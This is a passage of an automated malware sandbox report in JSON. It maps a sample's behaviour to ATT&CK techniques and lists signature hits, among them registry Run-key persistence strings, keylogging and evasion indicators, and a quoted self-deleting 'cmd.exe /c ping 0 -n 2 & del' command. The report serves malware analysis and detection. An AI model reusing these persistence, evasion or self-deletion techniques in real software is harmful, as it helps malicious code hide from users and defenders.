"https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 6}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Path Interception by PATH Environment Variable", "attck_id": "T1574.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Reflective Code Loading", "attck_id": "T1620", "attck_id_wiki": "https://attack.mitre.org/techniques/T1620", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "informative_identifiers_count": 2, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 20}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Replication Through Removable Media", "attck_id": "T1091", "attck_id_wiki": "https://attack.mitre.org/techniques/T1091", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "malicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 1, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Archive via Library", "attck_id": "T1560.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560/002", "informative_identifiers_count": 1, "parent": {"technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Manipulation", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"[Software\\Microsoft\\Windows\\CurrentVersion\\Run]\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"Software\\\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"Software\\Microsoft\\Internet Explorer\\Main\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"Software\\ShortCutInfection\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winsat\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\BIOS\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" in Source: be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\n \"[Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run]\" in Source: 6000015-cctor\n \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\" in Source: 6000015-cctor\n \"Software\\\\\" in Source: 6000020-Fransesco~DLV\n \"Software\\\\Microsoft\\\\Internet Explorer\\\\Main\" in Source: 6000033-Fransesco~AddHome\n \"Software\\\\ShortCutInfection\" in Source: 600004f-Fransesco~RegValueGet\n \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\" in Source: 6000057-Fransesco~Ind\n \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\\" in Source: 6000057-Fransesco~Ind\n \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\" in Source: 6000057-Fransesco~Ind\n \"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\\" in Source: 6000057-Fransesco~Ind\n \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\\" in Source: 6000057-Fransesco~Ind\n \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\" in Source: 6000057-Fransesco~Ind\n \"HKEY_LOCAL_MACHINE\\\\HARDWARE\\\\DESCRIPTION\\\\System\\\\CentralProcessor\\\\0\" in Source: 6000057-Fransesco~Ind\n \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winsat\" in Source: 6000057-Fransesco~Ind\n \"HKEY_LOCAL_MACHINE\\\\HARDWARE\\\\DESCRIPTION\\\\System\\\\BIOS\" in Source: 6000057-Fransesco~Ind\n \"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\" in Source: 6000057-Fransesco~Ind\n \"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\PublicProfile\" in Source: 6000057-Fransesco~Ind\n \"Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\" in Source: 600005a-Fransesco~INS\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run]\" in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp\n \"KEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp\n \"KEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp\n \"KEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winsat\" in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp\n \"KEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System\\BIOS\" in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp\n \"KEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp\n \"KEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\PublicProfile\" in Source: 00000000-00005756.00000000.65858.00262000.00000020.mdmp\n \"Read?HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\" in Source: 00000000-00005756.00000001.67784.00050000.00000004.mdmp\n 00000000-00005756.00000002.69706.00050000.00000004.mdmp\n \"[Software\\Microsoft\\Windows\\CurrentVersion\\Run]\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"System\\CurrentControlSet\\Control\\Session Manager\\Environment\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"Software\\Microsoft\\.NETFramework\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\.NETFramework\\.\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\.NETFramework\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\.NETFramework\\DbgJITDebugLaunchSetting\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\.NETFramework\\DbgManagedDebugger\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"Software\\Microsoft\\Windows NT\\CurrentVersion\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\.\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\InstallationType\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance\\.\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance\\Library\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance\\IsMultiInstance\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.NET CLR Networking\\Performance\\First Counter\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance\\.\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance\\CategoryOptions\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance\\FileMappingSize\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\n \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\.net clr networking\\Performance\\Counter Names\" in Source: 00000000-00005756.00000001.67784.01E70000.00000004.mdmp\n 00000000-00005756.00000002.69706.01E70000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"UseShellExecute\" (Indicator: \"ShellExecute\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API \"seShellExecute\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005756.00000000.65858.00262000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-174", "type": 2, "relevance": 1, "name": "Contains ability to executes commands or batch file", "description": "Found string \"cmd.exe /c ping 0 -n 2 & del \\\"\" (Indicator: \"cmd.exe /c\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"Sleep\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetProcessById\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"CompareString\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetObject\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetLogicalDrives\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetTempPath\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetCurrentProcess\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetFileInfo\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetEnvironmentVariable\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"MessageBox\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetTempFileName\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"SetEnvironmentVariable\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetForegroundWindow\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetVolumeInformation\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetWindowText\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"GetWindowTextLength\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"FindWindowEx\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"FindWindowExA\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"FindWindowA\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"SystemParametersInfoA\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"SendMessage\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"SetWindowPos\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"SystemParametersInfo\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference to API (Indicator: \"NtSuspendProcess\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")\n Found reference 